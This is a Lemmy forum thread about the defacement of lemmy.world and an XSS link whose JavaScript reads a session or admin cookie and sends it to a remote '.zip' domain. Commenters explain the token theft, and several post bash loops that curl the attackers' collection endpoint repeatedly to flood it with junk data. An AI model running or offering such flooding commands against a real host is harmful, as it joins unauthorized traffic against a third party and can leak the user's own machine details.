Are they just an issue with wefwef or trying to use an exploit

36 points

idk for sure but people are saying lemmy.world got hacked maybe it has to do with that?

permalink
report
reply
9 points
22 points

Definitely seems to be trying to exploit the same thing

permalink
report
parent
reply
8 points
*

yeah after reading more of the post I linked it definitely looks like it

permalink
report
parent
reply
96 points

Lemmy.world instance under attack right now. It was previously redirecting to 🍋 🎉 and the title and side bar changed to antisemitic trash.

They supposedly attributed it to a hacked admin account and was corrected. But the instance is still showing as defaced and now the page just shows it was “seized by reddit”.

Seems like there is much more going on right now and the attackers have much more than a single admin account.

permalink
report
reply
42 points

I just want to add a quick note:

From OPs screenshot, I noticed the JS code is attempting to extract the session cookie from the users that click on the link. If it’s successful, it attempts to exfiltrate to some server otherwise sends an empty value.

You can see the attacker/spammer obscures the url of the server using JS api as well.

May be how lemmy.world attackers have had access for a lengthy period of time. Attackers have been hijacking sessions of admins. The one compromised user opened up the flood gates.

Not a sec engineer, so maybe someone else can chime in.

permalink
report
parent
reply
18 points

You seem to be correct. Some sort of drive by login token scraper. Changing your password won’t help, because they still have an authorized copy of your login token. And I don’t think Lemmy has any sort of “Log out of all devices” button, (which deauthorizes all of the account’s login tokens) so there’s not much that a compromised account holder can do to stop it once the hacker has that token.

It’s the same thing that got Linus Tech Tips a few weeks back. Their entire YouTube account got hacked and turned into a fake “buy into our crypto and Elon Musk will give you a bunch of money” scam a few weeks back. And Linus quickly discovered that changing their passwords didn’t help, because the hackers were able to simply continue using the token they already had.

This was likely going on for a while, and only recently got activated because they finally snagged an admin account. Shit like this can lurk for a long time, simply waiting for the right target to stumble into it. They don’t really care about the individual accounts, except for helping spread the hack farther. But once they grabbed that admin account, they had what they wanted.

permalink
report
parent
reply
36 points

Here’s a quick bash script if anyone wants to help flood the attackers with garbage data to hopefully slow them down: while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64); sleep 1; done

Once every second, it grabs your computer name and the current system time, hashes them together to get a completely random string, trims off the shasum control characters and base64 encodes it to make everything look similar to what the attackers would be expecting, and sends it as a request to the same endpoint that their xss attack uses. It’ll run on Linux and macOS (and windows if you have a WSL vm set up!) and uses next to nothing in terms of system resources.

permalink
report
parent
reply
13 points

Try

while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64) > /dev/null ; sleep 1; done

It’ll prevent you from having to see the drivel that curl returns from that site.

permalink
report
parent
reply
7 points

Why would you include your hostname in the hash? That just sounds like an invitations for a mistake to leak semi-private telemetry data.

Come to think of it… Isn’t obscured telemetry exactly what your suggestion is doing? If they get or guess your hostname by other means, then they have a nice timestamped request from you, signed with your hostname, every second

permalink
report
parent
reply
4 points
*

Here’s the one where it uses epoch time (better randomization) and also hides the output of curl

while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done

permalink
report
parent
reply
17 points

Another instance was hacked too: https://lemmy.blahaj.zone/

permalink
report
parent
reply
21 points

Lemon party… Truly the fediverse is bringing us back to the golden age of the internet.

permalink
report
parent
reply
3 points

I thought I had forgotten about it all. Now they’re all back. I can even hear the piano from 2g1c slowly playing out. Help.

permalink
report
parent
reply
5 points

I can’t log into my account on lemmy.world, but I guess this is what they mean by federation and different instances continuing to work.

permalink
report
parent
reply
1 point

Do you think the accounts posting this have been hacked or are just bots or something.

permalink
report
parent
reply
7 points

Must be some boomer if they know what lemon party is, lmao. It’s been a hot minute since lemon party, one man one jar, or two girls one cup were being talked about.

permalink
report
parent
reply
14 points

Linking to lemonparty and saying “seized by reddit” strikes me as the playbook of an old 4chan troll/raid, trying to instigate more drama between two places they both hate at once.

permalink
report
parent
reply
6 points

Resetting federation to threads.net is even stronger proof that this was done by a ‘holds sporks so randum’ type of script kiddies.

permalink
report
parent
reply
10 points

Clicking on it would run javascript on load (most browsers block it by default), but I would avoid clicking either way.

permalink
report
reply
3 points

You can’t see what the link actually is, only its Label.

Onload, if interpreted as Javascript instead of text, would have executed on load, not on click.

permalink
report
parent
reply
20 points

The encoded string contains the URL zelensky dot zip. Zip is one of the newer top-level domains. It itself is not a zip file, but I am not going to visit that site to find out whatever treasures it has to offer…

permalink
report
reply
3 points

Not just that, it looks for a navAdmin cookie in your browser and sends that to zelensky(dot)zip/save/<your cookie here> in the form of a GET request.

permalink
report
parent
reply
8 points

Another reason to block this TLD in the firewall solution.

permalink
report
parent
reply
6 points

Yea I’ve got both .zip and .mov blocked on my pihole

permalink
report
parent
reply
-16 points

sorry i’m missing it. why this specific TLD? can’t they just use any TLD for this and achieve the same thing? is there something special with .mov?

permalink
report
parent
reply
-17 points
*

sorry i’m missing it. why this specific TLD? can’t they just use any TLD for this and achieve the same thing? why is this a reason to block it?

permalink
report
parent
reply
2 points

Because .zip is a commonly used file extension.

permalink
report
parent
reply
6 points

Curl didn’t return anything. They’re likely just using it to log requests since the request path contains the data they need.

permalink
report
parent
reply
-16 points

Click on one of the links and find out. Don’t forget to let us all know what happened. /s🤣🤣

permalink
report
reply
5 points

just a website with the usual bullshit rambings of anti-ukraine conspiracists.

permalink
report
parent
reply
9 points

And now it has your session cookie

permalink
report
parent
reply
3 points

Which is why I always check dodgy links in a non logged in browser in an isolated vm.

permalink
report
parent
reply
1 point
*
Deleted by creator
permalink
report
parent
reply

Asklemmy

!asklemmy@lemmy.ml

Create post

A loosely moderated place to ask open-ended questions

Search asklemmy 🔍

If your post meets the following criteria, it’s welcome here!

  1. Open-ended question
  2. Not offensive: at this point, we do not have the bandwidth to moderate overtly political discussions. Assume best intent and be excellent to each other.
  3. Not regarding using or support for Lemmy: context, see the list of support communities and tools for finding communities below
  4. Not ad nauseam inducing: please make sure it is a question that would be new to most members
  5. An actual topic of discussion

Looking for support?

Looking for a community?

Icon by @Double_A@discuss.tchncs.de

Community stats

  • 11K

    Monthly active users

  • 5.3K

    Posts

  • 296K

    Comments